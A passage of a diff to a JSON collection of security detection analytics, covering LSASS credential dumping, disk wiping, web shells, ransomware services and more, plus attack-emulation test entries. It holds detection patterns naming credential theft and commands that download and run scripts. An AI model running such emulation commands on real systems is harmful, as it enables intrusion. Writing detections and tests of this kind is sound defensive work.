addition, whether the account is privileged or not. Review the process requesting permissions and review parallel processes.", - "search": "`sysmon` EventCode=10 TargetImage=*lsass.exe NOT (SourceUser=\"NT AUTHORITY\\\\*\") | stats count min(_time) as firstTime max(_time) as lastTime by Computer, TargetImage, GrantedAccess, SourceImage, SourceProcessId, SourceUser, TargetUser | rename Computer as dest | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `windows_non_system_account_targeting_lsass_filter`", + "search": "`sysmon` EventCode=10 TargetImage=*lsass.exe NOT (SourceUser=\"NT AUTHORITY\\\\*\") | stats count min(_time) as firstTime max(_time) as lastTime by dest, parent_process_name, parent_process_path ,parent_process_id, TargetImage, GrantedAccess, SourceUser, TargetUser | rename TargetUser as user | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `windows_non_system_account_targeting_lsass_filter`", "tags": { "name": "Windows Non-System Account Targeting Lsass", "analytic_story": [ @@ -116132,7 +116574,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "A process, $SourceImage$, has loaded $ImageLoaded$ that are typically related to credential dumping on $dest$. Review for further details.", + "message": "A process, $parent_process_path$, has loaded $ImageLoaded$ that are typically related to credential dumping on $dest$. Review for further details.", "mitre_attack_id": [ "T1003.001", "T1003" @@ -116156,17 +116598,10 @@ ] }, { - "name": "ImageLoaded", + "name": "parent_process_path", "type": "Process", "role": [ - "Other" - ] - }, - { - "name": "SourceImage", - "type": "Process", - "role": [ - "Child Process" + "Parent Process" ] } ], @@ -116238,7 +116673,7 @@ { "name": "Windows Possible Credential Dumping", "description": "The following analytic is an enhanced version of two previous analytics that identifies common GrantedAccess permission requests and CallTrace DLLs in order to detect credential dumping. \\\nGrantedAccess is the requested permissions by the SourceImage into the TargetImage. \\\nCallTrace Stack trace of where open process is called. Included is the DLL and the relative virtual address of the functions in the call stack right before the open process call. \\\ndbgcore.dll or dbghelp.dll are two core Windows debug DLLs that have minidump functions which provide a way for applications to produce crashdump files that contain a useful subset of the entire process context. \\\nThe idea behind using ntdll.dll is to blend in by using native api of ntdll.dll. For example in sekurlsa module there are many ntdll exported api, like RtlCopyMemory, used to execute this module which is related to lsass dumping.", - "search": "`sysmon` EventCode=10 TargetImage=*\\\\lsass.exe GrantedAccess IN (\"0x01000\", \"0x1010\", \"0x1038\", \"0x40\", \"0x1400\", \"0x1fffff\", \"0x1410\", \"0x143a\", \"0x1438\", \"0x1000\") CallTrace IN (\"*dbgcore.dll*\", \"*dbghelp.dll*\", \"*ntdll.dll*\", \"*kernelbase.dll*\", \"*kernel32.dll*\") NOT SourceUser IN (\"NT AUTHORITY\\\\SYSTEM\", \"NT AUTHORITY\\\\NETWORK SERVICE\")| stats count min(_time) as firstTime max(_time) as lastTime by, Computer, SourceImage, GrantedAccess, TargetImage, SourceProcessId, SourceUser, TargetUser | rename Computer as dest | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)` | `windows_possible_credential_dumping_filter`", + "search": "`sysmon` EventCode=10 TargetImage=*\\\\lsass.exe granted_access IN (\"0x01000\", \"0x1010\", \"0x1038\", \"0x40\", \"0x1400\", \"0x1fffff\", \"0x1410\", \"0x143a\", \"0x1438\", \"0x1000\") CallTrace IN (\"*dbgcore.dll*\", \"*dbghelp.dll*\", \"*ntdll.dll*\", \"*kernelbase.dll*\", \"*kernel32.dll*\") NOT SourceUser IN (\"NT AUTHORITY\\\\SYSTEM\", \"NT AUTHORITY\\\\NETWORK SERVICE\") | stats count min(_time) as firstTime max(_time) as lastTime by dest, SourceImage, GrantedAccess, TargetImage, SourceProcessId, SourceUser, TargetUser | rename SourceUser as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_possible_credential_dumping_filter`", "tags": { "name": "Windows Possible Credential Dumping", "analytic_story": [ @@ -116255,7 +116690,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "A process, $SourceImage$, has loaded $ImageLoaded$ that are typically related to credential dumping on $dest$. Review for further details.", + "message": "A process, $SourceImage$, has loaded $TargetImage$ that are typically related to credential dumping on $dest$. Review for further details.", "mitre_attack_id": [ "T1003.001", "T1003" @@ -116278,13 +116713,6 @@ "Victim" ] }, - { - "name": "ImageLoaded", - "type": "Process", - "role": [ - "Other" - ] - }, { "name": "SourceImage", "type": "Process", @@ -116374,7 +116802,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An increase of Windows Post Exploitation behavior has been detected on $affected_systems$", + "message": "An increase of Windows Post Exploitation behavior has been detected on $risk_object$", "mitre_attack_id": [ "T1012", "T1049", @@ -116390,7 +116818,7 @@ ], "observable": [ { - "name": "affected_systems", + "name": "risk_object", "type": "Hostname", "role": [ "Victim" @@ -119203,7 +119631,7 @@ { "name": "Windows Raw Access To Disk Volume Partition", "description": "This analytic is to look for suspicious raw access read to device disk partition of the host machine. This technique was seen in several attacks by adversaries or threat actor to wipe, encrypt or overwrite the boot sector of each partition as part of their impact payload for example the \"hermeticwiper\" malware. This detection is a good indicator that there is a process try to read or write on boot sector.", - "search": "`sysmon` EventCode=9 Device = \\\\Device\\\\HarddiskVolume* NOT (Image IN(\"*\\\\Windows\\\\System32\\\\*\", \"*\\\\Windows\\\\SysWOW64\\\\*\")) | stats count min(_time) as firstTime max(_time) as lastTime by Image Device ProcessGuid ProcessId EventDescription EventCode Computer | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_raw_access_to_disk_volume_partition_filter`", + "search": "`sysmon` EventCode=9 Device = \\\\Device\\\\HarddiskVolume* NOT (Image IN(\"*\\\\Windows\\\\System32\\\\*\", \"*\\\\Windows\\\\SysWOW64\\\\*\")) | stats count min(_time) as firstTime max(_time) as lastTime by dest signature signature_id process_guid process_name process_path Device | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_raw_access_to_disk_volume_partition_filter`", "tags": { "name": "Windows Raw Access To Disk Volume Partition", "analytic_story": [ @@ -119221,7 +119649,7 @@ "kill_chain_phases": [ "Actions on Objectives" ], - "message": "Process accessing disk partition $device$ in $dest$", + "message": "Process accessing disk partition $Device$ in $dest$", "mitre_attack_id": [ "T1561.002", "T1561" @@ -119231,7 +119659,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -121914,8 +122342,8 @@ }, { "name": "Wermgr Process Connecting To IP Check Web Services", - "description": "this search is designed to detect suspicious wermgr.exe process that tries to connect to known IP web services. This technique is know for trickbot and other trojan spy malware to recon the infected machine and look for its ip address without so much finger print on the commandline process. Since wermgr.exe is designed for error handling process of windows it is really suspicious that this process is trying to connect to this IP web services cause that maybe cause of some malicious code injection.", - "search": "`sysmon` EventCode =22 process_name = wermgr.exe QueryName IN (\"*wtfismyip.com\", \"*checkip.amazonaws.com\", \"*ipecho.net\", \"*ipinfo.io\", \"*api.ipify.org\", \"*icanhazip.com\", \"*ip.anysrc.com\",\"*api.ip.sb\", \"ident.me\", \"www.myexternalip.com\", \"*zen.spamhaus.org\", \"*cbl.abuseat.org\", \"*b.barracudacentral.org\",\"*dnsbl-1.uceprotect.net\", \"*spam.dnsbl.sorbs.net\") | stats min(_time) as firstTime max(_time) as lastTime count by Image process_name ProcessId QueryName QueryStatus QueryResults Computer EventCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wermgr_process_connecting_to_ip_check_web_services_filter`", + "description": "This search is designed to detect suspicious wermgr.exe process that tries to connect to known IP web services. This technique is know for trickbot and other trojan spy malware to recon the infected machine and look for its ip address without so much finger print on the commandline process. Since wermgr.exe is designed for error handling process of windows it is really suspicious that this process is trying to connect to this IP web services cause that maybe cause of some malicious code injection.", + "search": "`sysmon` EventCode =22 process_name = wermgr.exe QueryName IN (\"*wtfismyip.com\", \"*checkip.amazonaws.com\", \"*ipecho.net\", \"*ipinfo.io\", \"*api.ipify.org\", \"*icanhazip.com\", \"*ip.anysrc.com\",\"*api.ip.sb\", \"ident.me\", \"www.myexternalip.com\", \"*zen.spamhaus.org\", \"*cbl.abuseat.org\", \"*b.barracudacentral.org\",\"*dnsbl-1.uceprotect.net\", \"*spam.dnsbl.sorbs.net\") | stats min(_time) as firstTime max(_time) as lastTime count by Image process_name ProcessId QueryName QueryStatus QueryResults Computer EventCode | rename Computer as dest| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wermgr_process_connecting_to_ip_check_web_services_filter`", "tags": { "name": "Wermgr Process Connecting To IP Check Web Services", "analytic_story": [ @@ -121928,7 +122356,7 @@ "kill_chain_phases": [ "Reconnaissance" ], - "message": "Wermgr.exe process connecting IP location web services on $ComputerName$", + "message": "Wermgr.exe process connecting IP location web services on $dest$", "mitre_attack_id": [ "T1590", "T1590.005" @@ -121938,7 +122366,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "type": "Endpoint", "role": [ "Victim" @@ -123236,7 +123664,7 @@ { "name": "Windows Driver Load Non-Standard Path", "description": "The following analytic uses Windows EventCode 7045 to identify new Kernel Mode Drivers being loaded in Windows from a non-standard path. Note that, adversaries may move malicious or vulnerable drivers into these paths and load up. The idea is that this analytic provides visibility into drivers loading in non-standard file paths.", - "search": "`wineventlog_system` EventCode=7045 ServiceType=\"kernel mode driver\" NOT (ImagePath IN (\"*\\\\Windows\\\\*\", \"*\\\\Program File*\", \"*\\\\systemroot\\\\*\",\"%SystemRoot%*\", \"system32\\*\")) | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ImagePath ServiceName ServiceType | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_driver_load_non_standard_path_filter`", + "search": "`wineventlog_system` EventCode=7045 ServiceType=\"kernel mode driver\" NOT (ImagePath IN (\"*\\\\Windows\\\\*\", \"*\\\\Program File*\", \"*\\\\systemroot\\\\*\",\"%SystemRoot%*\", \"system32\\*\")) | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ImagePath ServiceName ServiceType | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_driver_load_non_standard_path_filter`", "tags": { "name": "Windows Driver Load Non-Standard Path", "analytic_story": [ @@ -123252,7 +123680,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "A kernel mode driver was loaded from a non-standard path on $ComputerName$.", + "message": "A kernel mode driver was loaded from a non-standard path on $dest$.", "mitre_attack_id": [ "T1014", "T1068" @@ -123262,7 +123690,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "type": "Endpoint", "role": [ "Victim" @@ -124015,8 +124443,8 @@ } ], "command_list": [ - "cscript \\T1059.007\\src\\sys_info.js > $env:TEMP\\T1059.007.out.txt'", - "wscript \\T1059.007\\src\\sys_info.js" + "cscript \"\\T1059.007\\src\\sys_info.js\" > $env:TEMP\\T1059.007.out.txt\n", + "wscript \"\\T1059.007\\src\\sys_info.js\"\n" ], "commands": [], "queries": [], @@ -124046,13 +124474,13 @@ "dependencies": [ { "description": "Sample script must exist on disk at specified location (#{jscript})", - "prereq_command": "if (Test-Path #{jscript}) {exit 0} else {exit 1} ", - "get_prereq_command": "New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null\nInvoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js\" -OutFile \"#{jscript}\"" + "prereq_command": "if (Test-Path \"#{jscript}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -ItemType Directory (Split-Path \"#{jscript}\") -Force | Out-Null\nInvoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js\" -OutFile \"#{jscript}\"" } ], "executor": { - "command": "cscript #{jscript} > $env:TEMP\\T1059.007.out.txt'", - "cleanup_command": "Remove-Item $env:TEMP\\T1059.007.out.txt -ErrorAction Ignore", + "command": "cscript \"#{jscript}\" > $env:TEMP\\T1059.007.out.txt\n", + "cleanup_command": "del $env:TEMP\\T1059.007.out.txt >nul 2>&1", "name": "command_prompt" } }, @@ -124074,12 +124502,12 @@ "dependencies": [ { "description": "Sample script must exist on disk at specified location (#{jscript})", - "prereq_command": "if (Test-Path #{jscript}) {exit 0} else {exit 1} ", - "get_prereq_command": "New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null\nInvoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js\" -OutFile \"#{jscript}\"" + "prereq_command": "if (Test-Path \"#{jscript}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -ItemType Directory (Split-Path \"#{jscript}\") -Force | Out-Null\nInvoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js\" -OutFile \"#{jscript}\"" } ], "executor": { - "command": "wscript #{jscript}", + "command": "wscript \"#{jscript}\"\n", "name": "command_prompt" } } @@ -124605,7 +125033,7 @@ { "name": "MS Scripting Process Loading Ldap Module", "description": "This search is to detect a suspicious MS scripting process such as wscript.exe or cscript.exe that loading ldap module to process ldap query. This behavior was seen in FIN7 implant where it uses javascript to execute ldap query to parse host information that will send to its C2 server. this anomaly detections is a good initial step to hunt further a suspicious ldap query or ldap related events to the host that may give you good information regarding ldap or AD information processing or might be a attacker.", - "search": "`sysmon` EventCode =7 Image IN (\"*\\\\wscript.exe\", \"*\\\\cscript.exe\") ImageLoaded IN (\"*\\\\Wldap32.dll\", \"*\\\\adsldp.dll\", \"*\\\\adsldpc.dll\") | stats min(_time) as firstTime max(_time) as lastTime count by Image EventCode process_name ProcessId ProcessGuid Computer ImageLoaded | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ms_scripting_process_loading_ldap_module_filter`", + "search": "`sysmon` EventCode =7 Image IN (\"*\\\\wscript.exe\", \"*\\\\cscript.exe\") ImageLoaded IN (\"*\\\\Wldap32.dll\", \"*\\\\adsldp.dll\", \"*\\\\adsldpc.dll\") | stats min(_time) as firstTime max(_time) as lastTime count by Image EventCode process_name ProcessId ProcessGuid Computer ImageLoaded | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ms_scripting_process_loading_ldap_module_filter`", "tags": { "name": "MS Scripting Process Loading Ldap Module", "analytic_story": [ @@ -124695,7 +125123,7 @@ { "name": "MS Scripting Process Loading WMI Module", "description": "This search is to detect a suspicious MS scripting process such as wscript.exe or cscript.exe that loading wmi module to process wmi query. This behavior was seen in FIN7 implant where it uses javascript to execute wmi query to parse host information that will send to its C2 server. this anomaly detections is a good initial step to hunt further a suspicious wmi query or wmi related events to the host that may give you good information regarding process that are commonly using wmi query or modules or might be an attacker using this technique.", - "search": "`sysmon` EventCode =7 Image IN (\"*\\\\wscript.exe\", \"*\\\\cscript.exe\") ImageLoaded IN (\"*\\\\fastprox.dll\", \"*\\\\wbemdisp.dll\", \"*\\\\wbemprox.dll\", \"*\\\\wbemsvc.dll\" , \"*\\\\wmiutils.dll\", \"*\\\\wbemcomn.dll\") | stats min(_time) as firstTime max(_time) as lastTime count by Image EventCode process_name ProcessId ProcessGuid Computer ImageLoaded | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ms_scripting_process_loading_wmi_module_filter`", + "search": "`sysmon` EventCode =7 Image IN (\"*\\\\wscript.exe\", \"*\\\\cscript.exe\") ImageLoaded IN (\"*\\\\fastprox.dll\", \"*\\\\wbemdisp.dll\", \"*\\\\wbemprox.dll\", \"*\\\\wbemsvc.dll\" , \"*\\\\wmiutils.dll\", \"*\\\\wbemcomn.dll\") | stats min(_time) as firstTime max(_time) as lastTime count by Image EventCode process_name ProcessId ProcessGuid Computer ImageLoaded | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ms_scripting_process_loading_wmi_module_filter`", "tags": { "name": "MS Scripting Process Loading WMI Module", "analytic_story": [ @@ -126355,7 +126783,7 @@ { "name": "Clop Ransomware Known Service Name", "description": "This detection is to identify the common service name created by the CLOP ransomware as part of its persistence and high privilege code execution in the infected machine. Ussually CLOP ransomware use StartServiceCtrlDispatcherW API in creating this service entry.", - "search": "`wineventlog_system` EventCode=7045 Service_Name IN (\"SecurityCenterIBM\", \"WinCheckDRVs\") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Service_File_Name Service_Name Service_Start_Type Service_Type | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `clop_ransomware_known_service_name_filter`", + "search": "`wineventlog_system` EventCode=7045 Service_Name IN (\"SecurityCenterIBM\", \"WinCheckDRVs\") | stats count min(_time) as firstTime max(_time) as lastTime by dest EventCode Service_File_Name Service_Name Service_Start_Type Service_Type | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `clop_ransomware_known_service_name_filter`", "tags": { "name": "Clop Ransomware Known Service Name", "analytic_story": [ @@ -126369,7 +126797,7 @@ "Installation", "Exploitation" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ executing known Clop Ransomware service names.", + "message": "An instance of a known Clop Ransomware Service Name detected on $dest$", "mitre_attack_id": [ "T1543" ], @@ -126377,33 +126805,12 @@ "DE.CM" ], "observable": [ - { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, { "name": "dest", "type": "Hostname", "role": [ "Victim" ] - }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] } ], "risk_score": 100, @@ -126425,7 +126832,7 @@ { "name": "CMD Echo Pipe - Escalation", "description": "This analytic identifies a common behavior by Cobalt Strike and other frameworks where the adversary will escalate privileges, either via `jump` (Cobalt Strike PTH) or `getsystem`, using named-pipe impersonation. A suspicious event will look like `cmd.exe /c echo 4sgryt3436 > \\\\.\\Pipe\\5erg53`.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` OR Processes.process=*%comspec%* (Processes.process=*echo* AND Processes.process=*pipe*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmd_echo_pipe___escalation_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` OR Processes.process=*%comspec%* (Processes.process=*echo* AND Processes.process=*pipe*) by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmd_echo_pipe___escalation_filter`", "tags": { "name": "CMD Echo Pipe - Escalation", "analytic_story": [ @@ -126811,7 +127218,7 @@ "Installation", "Exploitation" ], - "message": "Services.exe spawned a LOLBAS process on $dest", + "message": "Services.exe spawned a LOLBAS process on $dest$", "mitre_attack_id": [ "T1543", "T1543.003" @@ -127117,7 +127524,8 @@ "Chaos Ransomware", "Trickbot", "Amadey", - "BlackByte Ransomware" + "BlackByte Ransomware", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -127200,7 +127608,7 @@ ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -128102,7 +128510,7 @@ { "description": "Chrome must be installed\n", "prereq_command": "if ((Test-Path \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\") -Or (Test-Path \"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\")) {exit 0} else {exit 1}", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\ChromeStandaloneSetup64.exe #{chrome_url}\nStart-Process PathToAtomicsFolder\\..\\ExternalPayloads\\ChromeStandaloneSetup64.exe /S\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ChromeStandaloneSetup64.exe\" #{chrome_url}\nStart-Process \"PathToAtomicsFolder\\..\\ExternalPayloads\\ChromeStandaloneSetup64.exe\" /S\n" } ], "executor": { @@ -128474,7 +128882,7 @@ { "name": "Detect Exchange Web Shell", "description": "The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell and ProxyNotShell. Paths include: `\\HttpProxy\\owa\\auth\\`, `\\inetpub\\wwwroot\\aspnet_client\\`, and `\\HttpProxy\\OAB\\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=System by _time span=1h Processes.process_id Processes.process_name Processes.dest | `drop_dm_object_name(Processes)` | join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN (\"*\\\\HttpProxy\\\\owa\\\\auth\\\\*\", \"*\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\*\", \"*\\\\HttpProxy\\\\OAB\\\\*\") Filesystem.file_name IN( \"*.aspx\", \"*.ashx\") by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path | `drop_dm_object_name(Filesystem)` | fields _time dest file_create_time file_name file_path process_name process_path process] | dedup file_create_time | table dest file_create_time, file_name, file_path, process_name | `detect_exchange_web_shell_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=System by _time span=1h Processes.process_id Processes.process_name Processes.dest | `drop_dm_object_name(Processes)` | join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN (\"*\\\\HttpProxy\\\\owa\\\\auth\\\\*\", \"*\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\*\", \"*\\\\HttpProxy\\\\OAB\\\\*\") Filesystem.file_name IN( \"*.aspx\", \"*.ashx\") by _time span=1h Filesystem.user Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path | `drop_dm_object_name(Filesystem)` | fields _time dest file_create_time file_name file_path process_name process_path process] | dedup file_create_time | table dest file_create_time, file_name, file_path, process_name | `detect_exchange_web_shell_filter`", "tags": { "name": "Detect Exchange Web Shell", "analytic_story": [ @@ -128754,7 +129162,119 @@ "Delivery", "Installation" ], - "message": "An instance of $process_name$ was identified on endpoint $dest$ writing a jsp file to disk, potentially indicative of exploitation.", + "message": "An instance of $process_name$ was identified on endpoint $dest$ writing a jsp file $file_name$ to disk, potentially indicative of exploitation.", + "mitre_attack_id": [ + "T1190", + "T1133" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "process_name", + "type": "Process", + "role": [ + "Child Process" + ] + } + ], + "risk_score": 42, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1190", + "mitre_attack_technique": "Exploit Public-Facing Application", + "mitre_attack_tactics": [ + "Initial Access" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT39", + "APT41", + "Axiom", + "BackdoorDiplomacy", + "BlackTech", + "Blue Mockingbird", + "Dragonfly", + "Earth Lusca", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "HAFNIUM", + "Ke3chang", + "Kimsuky", + "Magic Hound", + "Moses Staff", + "MuddyWater", + "Rocke", + "Threat Group-3390", + "Volatile Cedar", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1133", + "mitre_attack_technique": "External Remote Services", + "mitre_attack_tactics": [ + "Initial Access", + "Persistence" + ], + "mitre_attack_groups": [ + "APT18", + "APT28", + "APT29", + "APT41", + "Chimera", + "Dragonfly", + "FIN5", + "GALLIUM", + "GOLD SOUTHFIELD", + "Ke3chang", + "Kimsuky", + "LAPSUS$", + "Leviathan", + "OilRig", + "Sandworm Team", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Wizard Spider" + ] + } + ] + } + }, + { + "name": "Linux Java Spawning Shell", + "description": "The following analytic identifies the process name of Java, Apache, or Tomcat spawning a Linux shell. This is potentially indicative of exploitation of the Java application and may be related to current event CVE-2021-44228 (Log4Shell). The shells included in the macro are \"sh\", \"ksh\", \"zsh\", \"bash\", \"dash\", \"rbash\", \"fish\", \"csh', \"tcsh', \"ion\", \"eshell\". Upon triage, review parallel processes and command-line arguments to determine legitimacy.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=java OR Processes.parent_process_name=apache OR Processes.parent_process_name=tomcat `linux_shells` by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_java_spawning_shell_filter`", + "tags": { + "name": "Linux Java Spawning Shell", + "analytic_story": [ + "Data Destruction", + "Spring4Shell CVE-2022-22965", + "Hermetic Wiper", + "Log4Shell CVE-2021-44228" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Delivery", + "Installation" + ], + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ spawning a Linux shell, potentially indicative of exploitation.", "mitre_attack_id": [ "T1190", "T1133" @@ -128785,126 +129305,7 @@ ] } ], - "risk_score": 42, - "security_domain": "endpoint", - "risk_severity": "low", - "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1190", - "mitre_attack_technique": "Exploit Public-Facing Application", - "mitre_attack_tactics": [ - "Initial Access" - ], - "mitre_attack_groups": [ - "APT28", - "APT29", - "APT39", - "APT41", - "Axiom", - "BackdoorDiplomacy", - "BlackTech", - "Blue Mockingbird", - "Dragonfly", - "Earth Lusca", - "Fox Kitten", - "GALLIUM", - "GOLD SOUTHFIELD", - "HAFNIUM", - "Ke3chang", - "Kimsuky", - "Magic Hound", - "Moses Staff", - "MuddyWater", - "Rocke", - "Threat Group-3390", - "Volatile Cedar", - "menuPass" - ] - }, - { - "mitre_attack_id": "T1133", - "mitre_attack_technique": "External Remote Services", - "mitre_attack_tactics": [ - "Initial Access", - "Persistence" - ], - "mitre_attack_groups": [ - "APT18", - "APT28", - "APT29", - "APT41", - "Chimera", - "Dragonfly", - "FIN5", - "GALLIUM", - "GOLD SOUTHFIELD", - "Ke3chang", - "Kimsuky", - "LAPSUS$", - "Leviathan", - "OilRig", - "Sandworm Team", - "TEMP.Veles", - "TeamTNT", - "Threat Group-3390", - "Wizard Spider" - ] - } - ] - } - }, - { - "name": "Linux Java Spawning Shell", - "description": "The following analytic identifies the process name of Java, Apache, or Tomcat spawning a Linux shell. This is potentially indicative of exploitation of the Java application and may be related to current event CVE-2021-44228 (Log4Shell). The shells included in the macro are \"sh\", \"ksh\", \"zsh\", \"bash\", \"dash\", \"rbash\", \"fish\", \"csh', \"tcsh', \"ion\", \"eshell\". Upon triage, review parallel processes and command-line arguments to determine legitimacy.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=java OR Processes.parent_process_name=apache OR Processes.parent_process_name=tomcat `linux_shells` by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_java_spawning_shell_filter`", - "tags": { - "name": "Linux Java Spawning Shell", - "analytic_story": [ - "Data Destruction", - "Spring4Shell CVE-2022-22965", - "Hermetic Wiper", - "Log4Shell CVE-2021-44228" - ], - "asset_type": "Endpoint", - "cis20": [ - "CIS 10" - ], - "kill_chain_phases": [ - "Delivery", - "Installation" - ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ spawning a Linux shell, potentially indicative of exploitation.", - "mitre_attack_id": [ - "T1190", - "T1133" - ], - "nist": [ - "DE.CM" - ], - "observable": [ - { - "name": "dest", - "type": "Hostname", - "role": [ - "Victim" - ] - }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] - } - ], - "risk_score": 40, + "risk_score": 40, "security_domain": "endpoint", "risk_severity": "low", "mitre_attack_enrichments": [ @@ -128990,7 +129391,7 @@ "Delivery", "Installation" ], - "message": "An increase of Living Off The Land behavior has been detected on $affected_systems$", + "message": "An increase of Living Off The Land behavior has been detected on $risk_object$", "mitre_attack_id": [ "T1105", "T1190", @@ -129002,7 +129403,7 @@ ], "observable": [ { - "name": "affected_systems", + "name": "risk_object", "type": 